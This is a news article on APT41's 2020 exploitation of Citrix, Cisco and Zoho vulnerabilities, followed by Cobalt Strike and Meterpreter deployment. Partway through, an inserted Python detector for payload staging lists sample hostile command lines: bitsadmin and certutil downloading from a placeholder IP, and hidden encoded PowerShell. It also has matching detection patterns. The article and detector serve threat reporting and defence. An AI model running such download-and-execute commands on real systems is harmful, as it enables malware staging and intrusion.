The Chinese state-sponsored group APT41 has been at the helm of a range of attacks that used recent exploits to target security flaws in Citrix, Cisco, and Zoho appliances and devices of entities from a multitude of industry sectors spanning the globe.
It is not known if the campaign that started in January 2020 was designed to take advantage of companies having to focus on setting up everything needed by their remote workers while in COVID-19 lockdown or quarantine but, as FireEye researchers found, the attacks are definitely of a targeted nature.
Broadest Chinese APT campaign in years
As FireEye notes, APT41’s recent campaign is one of the most extensive ones Chinese cyber-espionage actors ran in recent years.
“Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central at over 75 FireEye customers,” the report says.
APT41 is a highly prolific Chinese-backed hacking group active since at least 2012 and known for espionage, cybercrime, and surveillance operations against a large array of industries, as well as individuals.
The group usually relies on spear-phishing emails to infiltrate a target’s network and then uses second-stage malware payloads to compromise the entire environment with the help of dozens of malicious tools while maintaining persistence.
Citrix devices under attack
In their latest campaign, the APT41 hackers were observed attacking targets in banking and finance, government, high tech, oil & gas, telecom, healthcare, media, and manufacturing.
During this series of seemingly targeted attacks, they focused their attention on entities from a multitude of countries including but not limited to the US, the UK, France, Italy, Japan, Saudi Arabia, and Switzerland.
“It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature,” FireEye’s researchers added.
While exploiting the CVE-2019-19781 vulnerability impacting Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) servers, APT41 only attempted exploitation against Citrix devices, which hints that the group was working from a list of previously identified servers collected during past Internet scans.
During this series of attacks, the APT41 actors were seen fluctuating between periods of high exploitation activity and intermissions.
As FireEye discovered, the hiatus intervals coincide either with Chinese holidays or with quarantine measures taken by the Chinese government in response to the COVID-19 pandemic.
“While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry,” the researchers said.
Zoho and Cisco exploitation
On February 21, APT41 compromised a telecommunications organization’s Cisco RV320 router but FireEye researchers were unable to determine what exploit was used during this attack after analyzing the incident.
“It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE’s (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload,” FireEye said.
APT41 then moved on to exploiting CVE-2020-10189, a zero-day, unauthenticated remote code execution vulnerability in Zoho ManageEngine that allows threat actors to execute arbitrary code as SYSTEM/root on unpatched systems.
Starting on March 8, one day after Zoho permanently fixed CVE-2020-10189, the Chinese group attacked over a dozen FireEye customers and managed to compromise the systems of at least five of them.
The CVE-2020-10189 exploitation activity is convoluted enough that you should probably just read the blog…but the TLDR is: exploit –> some combo of bitsadmin, powershell, Cobalt Strike backdoor, CertUtil, VMProtected Meterpreter downloader, BEACON shellcode pic.twitter.com/3FRTzre53H
— Christopher Glyer (@cglyer) March 25, 2020
The hackers then deployed a trial version of the Cobalt Strike BEACON loader and dropped another backdoor used for downloading a VMProtected Meterpreter downloader.
This isn’t the first time APT41 has used publicly available exploits to target internet-facing systems: FireEye previously observed the group abusing both CVE-2019-11510 in Pulse Secure VPN and CVE-2019-3396 in Atlassian Confluence as recently as October 2019.
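The post-exploitation chain described above (exploit, then some combination of bitsadmin, PowerShell, CertUtil and a Cobalt Strike BEACON loader) leans on Windows built-ins that are also used legitimately, so the defender's question is which invocations of those built-ins look like payload staging. The following script is an added example, not code from the article or from FireEye: it runs a small set of command-line heuristics over constructed process-creation events (the event fields, the URL 203.0.113.10 and the file paths are made up for the example; they are not indicators from the report) and flags only the download/decode patterns, leaving routine uses such as hashing a file untouched.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events for the example (not real telemetry).
# Fields mirror what an EDR or Sysmon Event ID 1 record would carry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": "bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job http://203.0.113.10/stage.bin C:\\Users\\Public\\stage.bin"},
    {"image": "certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://203.0.113.10/loader.txt C:\\Users\\Public\\loader.txt"},
    {"image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"image": "certutil.exe",
     "cmdline": "certutil -hashfile C:\\Program Files\\app\\app.exe SHA256"},          # benign
    {"image": "powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Windows\\Temp"},                            # benign
    {"image": "notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt"},                               # benign
]

# Heuristic patterns (an assumption of this example, not FireEye's detection logic):
# each tool is paired with the command-line fragments that indicate fetching or
# decoding a payload rather than day-to-day administration.
SUSPICIOUS: Dict[str, re.Pattern] = {
    "bitsadmin":  re.compile(r"/transfer\b|/addfile\b", re.IGNORECASE),
    "certutil":   re.compile(r"-urlcache|-decode\b", re.IGNORECASE),
    "powershell": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|frombase64string|-enc(odedcommand)?\b",
        re.IGNORECASE),
}

# Any of the three tools reaching out to an http(s) URL is worth a second look on its own.
URL_PATTERN = re.compile(r"https?://\S+", re.IGNORECASE)


def flag_event(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like LOLBin payload staging (empty if none)."""
    image = event["image"].lower()
    cmdline = event["cmdline"]
    reasons: List[str] = []
    for tool, pattern in SUSPICIOUS.items():
        if tool not in image:
            continue
        match = pattern.search(cmdline)
        if match:
            reasons.append(f"{tool}: {match.group(0)}")
        url = URL_PATTERN.search(cmdline)
        if url:
            reasons.append(f"{tool} fetching {url.group(0)}")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Scan a list of events and return (index, reasons) for every flagged one."""
    hits: List[Tuple[int, List[str]]] = []
    for idx, event in enumerate(events):
        reasons = flag_event(event)
        if reasons:
            hits.append((idx, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['cmdline']}")
        for reason in reasons:
            print(f"    - {reason}")
```

On the constructed sample the first three events are flagged and the three benign ones are not. In a real deployment the same heuristics would be combined with parent-process context (a web application's service process spawning any of these tools is far more telling than an administrator's console doing so), and the patterns would be tuned against the environment's own baseline to keep the false-positive rate manageable.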
“It is notable that we have only seen these exploitation attempts to leverage publicly available malware such as Cobalt Strike and Meterpreter,” the report concludes.
“While these backdoors are full-featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.
“This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.”
More details on APT41’s activities since the start of 2020 including indicators of compromise (IOCs) and a MITRE ATT&CK technique mapping are available at the end of FireEye’s report.